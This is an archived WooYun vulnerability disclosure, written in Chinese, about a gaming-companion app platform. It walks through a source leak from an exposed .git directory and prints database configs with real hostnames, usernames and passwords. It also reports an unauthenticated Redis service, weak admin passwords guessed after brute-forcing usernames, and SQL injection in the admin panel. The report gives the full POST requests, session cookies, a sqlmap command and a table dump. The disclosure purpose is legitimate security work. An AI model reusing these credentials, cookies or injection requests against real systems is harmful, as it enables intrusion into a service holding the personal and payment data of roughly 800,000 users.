乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-05-12: 细节已通知厂商并且等待厂商处理中 2016-05-12: 厂商已经确认,细节仅向厂商公开 2016-05-22: 细节向核心白帽子及相关领域专家公开 2016-06-01: 细节向普通白帽子公开 2016-06-11: 细节向实习白帽子公开 2016-06-26: 细节向公众公开
RT
首先是git源码泄露http://121.40.223.69:8028/.git/config用李姐姐的git脚本下载下来源码
来config找配置文件
database.php---------------------------------------<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');/*| -------------------------------------------------------------------| DATABASE CONNECTIVITY SETTINGS| -------------------------------------------------------------------| This file will contain the settings needed to access your database.|| For complete instructions please consult the 'Database Connection'| page of the User Guide.|| -------------------------------------------------------------------| EXPLANATION OF VARIABLES| -------------------------------------------------------------------|| ['hostname'] The hostname of your database server.| ['username'] The username used to connect to the database| ['password'] The password used to connect to the database| ['database'] The name of the database you want to connect to| ['dbdriver'] The database type. ie: mysql. Currently supported: mysql, mysqli, postgre, odbc, mssql, sqlite, oci8| ['dbprefix'] You can add an optional prefix, which will be added| to the table name when using the Active Record class| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.| ['cache_on'] TRUE/FALSE - Enables/disables query caching| ['cachedir'] The path to the folder where cache files should be stored| ['char_set'] The character set used in communicating with the database| ['dbcollat'] The character collation used in communicating with the database| NOTE: For MySQL and MySQLi databases, this setting is only used| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7| (and in table creation queries made with DB Forge).| There is an incompatibility in PHP with mysql_real_escape_string() which| can make your site vulnerable to SQL injection if you are using a| multi-byte character set and are running versions lower than these.| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.| ['swap_pre'] A default table prefix that should be swapped with the dbprefix| ['autoinit'] Whether or not to automatically initialize the database.| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections| - good for ensuring strict SQL while developing|| The $active_group variable lets you choose which connection group to| make active. By default there is only one group (the 'default' group).|| The $active_record variables lets you determine whether or not to load| the active record class*/$active_group = 'default';$active_record = TRUE;$db['default']['hostname'] = '120.55.130.50';$db['default']['username'] = 'ypp_test';$db['default']['password'] = 'vbnm1234_2015n1';$db['default']['database'] = 'ypp_app';$db['default']['dbdriver'] = 'mysql';$db['default']['dbprefix'] = '';$db['default']['pconnect'] = TRUE;$db['default']['db_debug'] = TRUE;$db['default']['cache_on'] = FALSE;$db['default']['cachedir'] = '';$db['default']['char_set'] = 'utf8';$db['default']['dbcollat'] = 'utf8_general_ci';$db['default']['swap_pre'] = '';$db['default']['autoinit'] = TRUE;$db['default']['stricton'] = FALSE;$db['read']['hostname'] = '120.55.130.50';$db['read']['username'] = 'ypp_test';$db['read']['password'] = 'vbnm1234_2015n1';$db['read']['database'] = 'ypp_app';$db['read']['dbdriver'] = 'mysql';$db['read']['dbprefix'] = '';$db['read']['pconnect'] = TRUE;$db['read']['db_debug'] = TRUE;$db['read']['cache_on'] = FALSE;$db['read']['cachedir'] = '';$db['read']['char_set'] = 'utf8';$db['read']['dbcollat'] = 'utf8_general_ci';$db['read']['swap_pre'] = '';$db['read']['autoinit'] = TRUE;$db['read']['stricton'] = FALSE;/* End of file database.php *//* Location: ./application/config/database.php */-------------------------databasebak.php-------------------------------<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');/*| -------------------------------------------------------------------| DATABASE CONNECTIVITY SETTINGS| -------------------------------------------------------------------| This file will contain the settings needed to access your database.|| For complete instructions please consult the 'Database Connection'| page of the User Guide.|| -------------------------------------------------------------------| EXPLANATION OF VARIABLES| -------------------------------------------------------------------|| ['hostname'] The hostname of your database server.| ['username'] The username used to connect to the database| ['password'] The password used to connect to the database| ['database'] The name of the database you want to connect to| ['dbdriver'] The database type. ie: mysql. Currently supported: mysql, mysqli, postgre, odbc, mssql, sqlite, oci8| ['dbprefix'] You can add an optional prefix, which will be added| to the table name when using the Active Record class| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.| ['cache_on'] TRUE/FALSE - Enables/disables query caching| ['cachedir'] The path to the folder where cache files should be stored| ['char_set'] The character set used in communicating with the database| ['dbcollat'] The character collation used in communicating with the database| NOTE: For MySQL and MySQLi databases, this setting is only used| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7| (and in table creation queries made with DB Forge).| There is an incompatibility in PHP with mysql_real_escape_string() which| can make your site vulnerable to SQL injection if you are using a| multi-byte character set and are running versions lower than these.| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.| ['swap_pre'] A default table prefix that should be swapped with the dbprefix| ['autoinit'] Whether or not to automatically initialize the database.| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections| - good for ensuring strict SQL while developing|| The $active_group variable lets you choose which connection group to| make active. By default there is only one group (the 'default' group).|| The $active_record variables lets you determine whether or not to load| the active record class*/$active_group = 'default';$active_record = TRUE;$db['default']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';$db['default']['username'] = 'ypp_test';$db['default']['password'] = 'vbnm1234_2015n1';$db['default']['database'] = 'ypp_app';$db['default']['dbdriver'] = 'mysqli';$db['default']['dbprefix'] = '';$db['default']['pconnect'] = TRUE;$db['default']['db_debug'] = TRUE;$db['default']['cache_on'] = FALSE;$db['default']['cachedir'] = '';$db['default']['char_set'] = 'utf8';$db['default']['dbcollat'] = 'utf8_general_ci';$db['default']['swap_pre'] = '';$db['default']['autoinit'] = TRUE;$db['default']['stricton'] = FALSE;$db['read']['hostname'] = 'rds545rqplqgyjlcxbsrupublic.mysql.rds.aliyuncs.com';$db['read']['username'] = 'ypp_test';$db['read']['password'] = 'vbnm1234_2015n1';$db['read']['database'] = 'ypp_app';$db['read']['dbdriver'] = 'mysqli';$db['read']['dbprefix'] = '';$db['read']['pconnect'] = TRUE;$db['read']['db_debug'] = TRUE;$db['read']['cache_on'] = FALSE;$db['read']['cachedir'] = '';$db['read']['char_set'] = 'utf8';$db['read']['dbcollat'] = 'utf8_general_ci';$db['read']['swap_pre'] = '';$db['read']['autoinit'] = TRUE;$db['read']['stricton'] = FALSE;/*活动激活的数据库 读写*/$db['huodong_default']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';$db['huodong_default']['username'] = 'crop_sys_admin';$db['huodong_default']['password'] = 'yppcroprds2016';$db['huodong_default']['database'] = 'ypp_cms_db';$db['huodong_default']['dbdriver'] = 'mysqli';$db['huodong_default']['dbprefix'] = '';$db['huodong_default']['pconnect'] = TRUE;$db['huodong_default']['db_debug'] = TRUE;$db['huodong_default']['cache_on'] = FALSE;$db['huodong_default']['cachedir'] = '';$db['huodong_default']['char_set'] = 'utf8';$db['huodong_default']['dbcollat'] = 'utf8_general_ci';$db['huodong_default']['swap_pre'] = '';$db['huodong_default']['autoinit'] = TRUE;$db['huodong_default']['stricton'] = FALSE;/*活动激活的数据库 读*/$db['huodong_read']['hostname'] = 'rds659r99gpc0lsarrd4o.mysql.rds.aliyuncs.com';$db['huodong_read']['username'] = 'crop_sys_admin';$db['huodong_read']['password'] = 'yppcroprds2016';$db['huodong_read']['database'] = 'ypp_cms_db';$db['huodong_read']['dbdriver'] = 'mysqli';$db['huodong_read']['dbprefix'] = '';$db['huodong_read']['pconnect'] = TRUE;$db['huodong_read']['db_debug'] = TRUE;$db['huodong_read']['cache_on'] = FALSE;$db['huodong_read']['cachedir'] = '';$db['huodong_read']['char_set'] = 'utf8';$db['huodong_read']['dbcollat'] = 'utf8_general_ci';$db['huodong_read']['swap_pre'] = '';$db['huodong_read']['autoinit'] = TRUE;$db['huodong_read']['stricton'] = FALSE;/* End of file database.php *//* Location: ./application/config/database.php */
redis未授权访问121.40.223.69:6379
尝试getshell 哎可惜不好使
然后找到管理系统 http://121.40.223.69:8028/admin/爆破出5个用户名chenyan zhanglinzhangyongguochaoliyongsheng然后试试用户密码相同的 liyongsheng liyongsheng guochao guochao 有2个用户
成功进入后台看到80w用户信息啦
哇好多哦
找了下后台sql注入 好多的 我就找了2个post注入语法:sqlmap.py -r 1.txt --dbs 参数wangbano-------------------post参数--------------------------------POST /admin/pubwin_stores_list HTTP/1.1Host: 121.40.223.69:8028Proxy-Connection: keep-aliveContent-Length: 98Accept: */*Origin: http://121.40.223.69:8028X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://121.40.223.69:8028/admin/indexAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22d2861bb11873a6c90460ef26416b6f89%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462990496%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D4bcb57eee7a61ab4f899d97f5db07424pageNum=1&numPerPage=20&wangbano=1&store_name=1&server_version=1&can_recharge=&can_select_balance=--------------------------另外一处----------参数 mobile-------------------- POST /admin/god_list HTTP/1.1Host: 121.40.223.69:8028Proxy-Connection: keep-aliveContent-Length: 206Accept: */*Origin: http://121.40.223.69:8028X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://121.40.223.69:8028/admin/indexAccept-Encoding: gzip,deflateAccept-Language: zh-CN,zh;q=0.8Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221eae6a510bc7164581ec422a36287375%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22115.214.46.142%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A120%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F38.0.2125.122+Safari%2F537.36+SE+2.X+Met%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1462991222%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A13%3A%22session_admin%22%3BO%3A8%3A%22stdClass%22%3A12%3A%7Bs%3A2%3A%22id%22%3Bs%3A32%3A%228866911c1bcf252661f371d551223e21%22%3Bs%3A8%3A%22username%22%3Bs%3A7%3A%22guochao%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22290627921faed27657267299574975b8%22%3Bs%3A6%3A%22status%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22role%22%3Bs%3A32%3A%22561168d496841527359a0c57b7586a3e%22%3Bs%3A8%3A%22store_id%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22create_time%22%3Bs%3A19%3A%222016-03-01+15%3A44%3A02%22%3Bs%3A4%3A%22city%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22token%22%3Bs%3A0%3A%22%22%3Bs%3A8%3A%22realname%22%3Bs%3A6%3A%22%E9%83%AD%E8%B6%85%22%3Bs%3A14%3A%22remember_token%22%3BN%3Bs%3A10%3A%22updated_at%22%3BN%3B%7D%7D681991a95831bb63fbe22bb5f789610cpageNum=1&numPerPage=20&mobile=1&source=&isbind=&is_official=&price_begin=1&price_end=&god_company_id=&keyword=1&true_name=&gender=&status=&createtime_begin=2016-05-11&createtime_end=2016-05-19&city_name=11
数据库信息
available databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] ypp_app_test
表信息
Database: ypp_app_test+----------------------------------+---------+| Table | Entries |+----------------------------------+---------+| t_user_login | 4918627 || t_dongtai_reply | 3559021 || t_score_journal | 2950727 || t_recharge | 1722530 || t_notify | 1433701 || t_sms_log | 1269551 || t_god_score_log | 1092585 || t_platform_game_winner | 1040977 || t_user_ext | 802812 || t_user | 801473 || t_sys_invite_code | 772075 || t_wy_register | 641601 || t_coupon_detail | 638662 || t_user_journal | 488742 || t_sms_submail_log | 478570 || t_user_month_login | 470310 || t_dongtai | 428084 || t_dongtai_dashang | 405641 || t_god_lovelog | 398673 || t_fin_alipayjournal_old | 393343 || t_user_cash_journal | 389924 || t_recharge_pomotion_users | 327359 || t_play_order | 257786 || t_platform_game_winner_backup | 256938 || t_admin_log | 250742 || t_user_photo | 234687 || t_staff_drink | 229784 || t_signin | 220205 || t_chat_log | 186966 || t_mobile_area | 149310 || t_god_apply_photo | 129561 || t_play_response | 126662 || t_user_game | 111407 || t_god_journal | 109822 || t_user_oftenstore | 94596 || t_play_order_rate | 84686 || t_fin_alipayjournal | 70690 || t_store_recharge_day_report | 67199 || t_group_member | 63781 || t_god_cert | 62472 || t_god_apply | 54037 || t_fin_weixinjournal | 48846 || t_biz_log | 48316 || t_user_invite | 28339 || t_god_items | 25889 || t_store_machine | 25241 || t_play_order_god_rate | 24506 || t_user_count | 24095 || t_god_item_apply | 22043 || t_godgame_photo | 19752 || t_cash_give | 15052 || t_reserve | 14859 || t_god_jiesuan | 14262 || t_cash_get | 14107 || t_god_edit_apply | 13451 || t_bind_journal | 12344 || t_coupon_codes | 9311 || t_god | 9259 || t_god_order_day_log | 8445 || t_user_auth | 8151 || t_jubao | 7922 || t_play_order_day_report | 7280 || t_withdraw | 6647 || t_god_game | 6590 || t_dongtai_dashang_day_report | 6038 || t_god_search | 5982 || t_bind_journal_day_report | 5577 || t_group | 5017 || t_user_alias | 4613 || t_group_invitelog | 4476 || t_user_poi | 4013 || tmp_god_ids | 3909 || t_game_winner_day_report | 3415 || t_bind_journal_jiaoban_report | 3219 || t_shenzhi_code | 3000 || t_activity_member | 2947 || t_chat_check | 2805 || t_admin_role_function | 2638 || test_code | 2231 || t_biz_city_cat_price | 2186 || t_dongtai_dashang_jiaoban_report | 2071 || t_group_photo | 2035 || t_user_vip | 2015 || t_store_recharge_jiaoban_report | 1861 || t_tg_gudu | 1825 || t_game_winner_jiaoban_report | 1741 || t_user_journal_jiaoban_report | 1741 || t_fin_changelog | 1589 || t_suggestion | 1581 || t_store_region | 1541 || tmp_dongtai | 1182 || t_group_poi | 1065 || t_store | 753 || t_god_100 | 721 || t_activity | 677 || t_god_recommand | 525 || t_game_partition | 524 || t_biz_city_cat | 440 || t_activity_reply | 434 || t_sys_citys | 407 || tmp_gods | 381 || t_pubwin_stores | 373 || t_city | 372 || t_admin_function | 371 || t_play_order_shensu | 371 || t_ypp_money | 304 || t_game_duanwei | 296 || t_manual_recharge_to_ypp | 245 || t_apilist | 241 || t_gym | 237 || t_store_manager | 227 || t_coupon | 180 || t_mall_order | 128 || t_bizcircle | 122 || t_god_city | 95 || t_cat_tag | 90 || t_dongtai_keyword | 75 || t_game_weizhi | 73 || t_playorder_recharge_log | 64 || t_god_eidt_price_apply | 51 || t_admin_staff | 49 || t_banner | 39 || t_user_vip_hours | 35 || t_cat_level | 32 || t_pubwin_region | 31 || t_download_ypp | 30 || t_dictionary | 29 || t_coupon_laplus | 27 || t_user_black | 25 || t_tuiguang_qudao | 23 || t_user_subscribe | 22 || t_admin_role | 21 || t_biz_cat | 19 || t_sysmessage | 19 || t_biz_cat_price | 18 || t_region | 15 || t_game | 13 || t_biz_cert | 12 || t_recharge_promotion_detail | 12 || t_bank | 10 || t_search_hotwords | 10 || t_biz_navigation | 9 || t_recharge_promotion | 9 || t_wy_shop_region | 9 || t_huodong_item | 8 || t_user_vip_coupon | 8 || t_compaign | 7 || t_jubao_reason | 7 || t_act_prize_config | 6 || t_complain_custome | 6 || t_quiz_items | 6 || t_version | 6 || t_god_company | 5 || t_god_guides | 5 || t_user_attach | 5 || t_user_vip_config | 4 || t_chat_warn | 3 || t_coupon_user | 3 || t_hobby | 3 || t_mall_product | 3 || t_quiz | 3 || t_site | 3 || t_ad | 2 || t_city_new_cat_img | 2 || t_data_version | 2 || t_drink | 2 || t_home_recommand | 2 || t_huodong | 2 || t_act_qualifications_config | 1 || t_app_setting | 1 || t_god_cert_edit_apply | 1 || t_groupno | 1 || t_platform_game | 1 || t_pushmessage | 1 |+----------------------------------+---------+
过滤下参数 加强密码
危害等级:高
漏洞Rank:20
确认时间:2016-05-12 10:26
漏洞严重,内部数据库暴露,目前已经组织修复。
暂无
